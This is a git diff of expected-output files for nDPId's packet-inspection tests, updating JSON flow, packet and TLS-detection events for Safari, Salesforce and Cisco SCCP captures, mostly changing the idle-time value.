+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} 
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+01215{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5399,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3690,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","packets-captured":6019,"packets-processed":6019,"total-skipped-flows":0,"total-l4-data-len":5172339,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1620898029980} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6019/6019 diff --git a/test/results/salesforce.pcap.out b/test/results/salesforce.pcap.out index 78c884f9c..fb9b8ad25 100644 --- a/test/results/salesforce.pcap.out +++ b/test/results/salesforce.pcap.out 
@@ -1,13 +1,13 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"salesforce.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1637949675032} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637949675032,"flow_last_seen":1637949675032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637949675032,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} 
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
-01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637949675032,"flow_last_seen":1637949675032,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637949675032,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":4195,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1637949675181} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 diff --git a/test/results/sccp_hw_conf_register.pcapng.out b/test/results/sccp_hw_conf_register.pcapng.out index 662d19102..e9014a4e6 100644 --- a/test/results/sccp_hw_conf_register.pcapng.out +++ b/test/results/sccp_hw_conf_register.pcapng.out 
@@ -1,11 +1,11 @@ 00474{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1557178511664} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 